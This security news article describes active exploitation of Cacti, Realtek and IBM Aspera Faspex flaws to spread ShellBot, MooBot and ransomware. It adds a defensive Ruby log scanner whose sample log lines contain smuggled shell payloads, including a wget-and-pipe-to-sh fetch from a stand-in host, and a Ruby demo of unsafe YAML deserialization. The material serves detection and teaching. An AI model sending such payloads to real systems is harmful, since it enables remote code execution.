Cacti, Realtek, and IBM Aspera Faspex vulnerabilities under active exploitation


Multiple threat actors are exploiting severe security flaws in Cacti, Realtek, and IBM Aspera Faspex to target unpatched systems. The attacks abuse CVE-2022-46169 (CVSS score: 9.8) and CVE-2021-35394 (CVSS score: 9.8) to deliver ShellBot (also known as PerlBot) and MooBot, according to a report published by Fortinet FortiGuard Labs this week.

“CVE-2022-46169 is a command injection vulnerability that allows an unauthenticated user to execute arbitrary code on a server running Cacti. The vulnerability resides in the ‘remote_agent.php’ file, which can be accessed without authentication.”
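Because the vulnerable endpoint is reachable without authentication, the most useful thing a defender can do besides patching is to look for exploitation attempts in web server logs. The Ruby script below is an added example written for this article, not code from Fortinet or the Cacti project. It assumes Apache combined log format and the request shape the public Cacti advisory for CVE-2022-46169 describes: a request to remote_agent.php with action=polldata, where the poller_id parameter is concatenated into a shell command without sanitisation. A legitimate Cacti poller only ever sends an integer poller_id, so any non-numeric value in such a request is a strong signal. The log lines are constructed for illustration; the hosts, paths and payloads are made up.

```ruby
require "cgi"

# Constructed Apache combined-log lines for illustration; the hosts, paths and
# payloads are made up and are not taken from the Fortinet report.
SAMPLE_ACCESS_LOG = <<~LOG
  10.0.0.5 - - [31/Mar/2023:10:12:01 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=6 HTTP/1.1" 200 512 "-" "curl/7.81.0"
  203.0.113.7 - - [31/Mar/2023:10:12:09 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=1%3Bwget%20http%3A%2F%2F198.51.100.9%2Fx.sh%7Csh&host_id=1&local_data_ids[]=6 HTTP/1.1" 200 512 "-" "python-requests/2.28"
  10.0.0.8 - - [31/Mar/2023:10:13:00 +0000] "GET /cacti/graph_view.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Mar/2023:10:13:30 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=%60id%60&host_id=1&local_data_ids[]=6 HTTP/1.1" 200 512 "-" "python-requests/2.28"
LOG

# Combined log format: client, ident, user, [timestamp], "METHOD target HTTP/x", status ...
ACCESS_LINE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: [^"]*)?" (\d{3})/

# Split one combined-log line into the fields the detection needs.
# Returns nil for lines that do not match the format.
def parse_access_line(line)
  m = ACCESS_LINE.match(line)
  return nil unless m
  path, query = m[4].split("?", 2)
  {
    ip: m[1], time: m[2], method: m[3], path: path,
    params: CGI.parse(query.to_s), # percent-decodes values; each key maps to an array
    status: m[5].to_i
  }
end

# A legitimate Cacti poller only ever sends an integer poller_id. Anything else
# in a polldata request to remote_agent.php is an attempt to smuggle shell
# metacharacters into the command that Cacti builds from that value.
def suspicious_cacti_request?(req)
  return false unless req[:path].end_with?("/remote_agent.php")
  return false unless req[:params].fetch("action", []).include?("polldata")
  poller_id = req[:params].fetch("poller_id", []).first.to_s
  !poller_id.match?(/\A\d+\z/)
end

# Parse every line of an access log and return the suspicious requests.
def find_cacti_exploit_attempts(log_text)
  log_text.each_line
          .map { |line| parse_access_line(line) }
          .compact
          .select { |req| suspicious_cacti_request?(req) }
end

if __FILE__ == $PROGRAM_NAME
  find_cacti_exploit_attempts(SAMPLE_ACCESS_LOG).each do |req|
    puts "#{req[:time]} #{req[:ip]} poller_id=#{req[:params]['poller_id'].first.inspect}"
  end
end
```

Two caveats for anyone adapting this: Cacti reads these parameters from the request as a whole, so the same payload can arrive in a POST body that a standard access log never records; and the authentication bypass works by presenting a spoofable client address (for example via X-Forwarded-For), so a log format that records that header will show the spoofed value alongside the real source IP.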

Malware analysis

  • CVE-2022-46169 combines an authentication bypass with a command injection flaw in Cacti servers, allowing unauthenticated attackers to execute arbitrary code. It was fixed in Cacti 1.2.23.
  • CVE-2021-35394 is likewise an arbitrary command injection vulnerability; it affects the Realtek Jungle SDK and was patched by Realtek in 2021.

Although CVE-2021-35394 has been previously exploited to disseminate botnets such as Mirai, Gafgyt, Mozi, and RedGoBot, this is the first instance where it has been used to deploy MooBot, a variant of Mirai that has been active since 2019.

MooBot and ShellBot

Besides being leveraged for MooBot attacks, the Cacti flaw has also been observed serving ShellBot payloads since January 2023, when the issue came to light.

At least three different versions of ShellBot have been detected:

  • PowerBots (C) GohacK
  • LiGhT’s Modded perlbot v2
  • B0tchZ 0.2a

The first two were recently disclosed by the AhnLab Security Emergency response Center (ASEC).

“Compromised victims can be controlled and used as DDoS bots after receiving a command from a C2 server,” a Fortinet researcher said.

“Because MooBot can kill other botnet processes and also deploy brute force attacks, administrators should use strong passwords and change them periodically.”

Active exploitation of IBM Aspera Faspex flaw

A critical security vulnerability, CVE-2022-47986 (CVSS score: 9.8), a YAML deserialization flaw in IBM’s Aspera Faspex file exchange application, is also under active exploitation, making it the third flaw targeted in this manner.
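The article does not explain what makes a YAML deserialization flaw exploitable, so the following Ruby example is added here to show the bug class in the language Faspex is built on. It is an illustration, not Faspex's own code: the AuditRecord class, the method names and the request bodies are all assumed. The point is that the full YAML loader lets the sender choose which Ruby class gets instantiated and which instance variables it receives, whereas safe_load rejects any class tag before an object exists.

```ruby
require "yaml"

# Harmless stand-in for any class on the application's load path. The bug class
# is that the sender, not the application, picks which class gets instantiated
# and which instance variables it receives.
class AuditRecord
  attr_reader :note
  def initialize(note = nil)
    @note = note
  end
end

# Constructed request body: a YAML tag naming a Ruby class. A real exploit names
# classes whose methods run code when the object is revived or later used.
HOSTILE_BODY = <<~YAML
  --- !ruby/object:AuditRecord
  note: instantiated from untrusted input
YAML

# Constructed benign body: plain key/value data, which both loaders accept.
BENIGN_BODY = "note: plain string data\n"

# Vulnerable pattern: deserialize a request body with the full YAML loader.
# Psych 4 (Ruby 3.1+) made YAML.load safe by default, so the unsafe loader is
# called explicitly where it exists to keep the demonstration faithful.
def parse_metadata_unsafe(body)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(body) : YAML.load(body)
end

# Hardened pattern: safe_load only builds core types (strings, numbers, arrays,
# hashes). Any !ruby/object tag raises Psych::DisallowedClass before the object
# is created, so the sender never gets to choose a class.
def parse_metadata_safe(body)
  YAML.safe_load(body)
rescue Psych::DisallowedClass => e
  { "rejected" => true, "reason" => e.message }
end

if __FILE__ == $PROGRAM_NAME
  obj = parse_metadata_unsafe(HOSTILE_BODY)
  puts "unsafe loader built a #{obj.class} with note=#{obj.note.inspect}"
  puts "safe loader returned #{parse_metadata_safe(HOSTILE_BODY).inspect}"
end
```

If an application genuinely needs to deserialize its own objects, the right shape is still safe_load with an explicit permitted_classes list, never the full loader on data that crossed a trust boundary.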

The bug, which was fixed in December 2022 (version 4.4.2 Patch Level 2), has been used since February in ransomware attacks associated with Buhti and IceFire. Exploitation followed quickly after a proof-of-concept (PoC) exploit was released.

Earlier this week, cybersecurity firm Rapid7 said one of its customers was breached via this vulnerability and urged immediate application of the fixes. Because Faspex is typically a publicly accessible service and the flaw has been linked to ransomware group operations, the company advises taking the service offline if the patch cannot be installed right away.

Fortinet protections against the exploitation

ShellBot and MooBot are delivered to exploitable servers. Fortinet lists the following protections:

  • Fortinet has released IPS signatures to proactively protect customers from the threats contained in the exploit list.
  • The FortiGuard Web Filtering Service blocks the C2 server.
  • FortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.

Concluding thoughts 

Patched or not, no system is ever fully protected: vulnerabilities will keep being exploited, and some residual risk always remains. The goal is to reduce exposure with every measure available, and above all to stay vigilant and know what is happening in your environment.

Author: PureVPN

Date: April 4, 2023

PureVPN is a leading VPN service provider that excels in providing easy solutions for online privacy and security. With 6000+ servers in 65+ countries, It helps consumers and businesses in keeping their online identity secured.
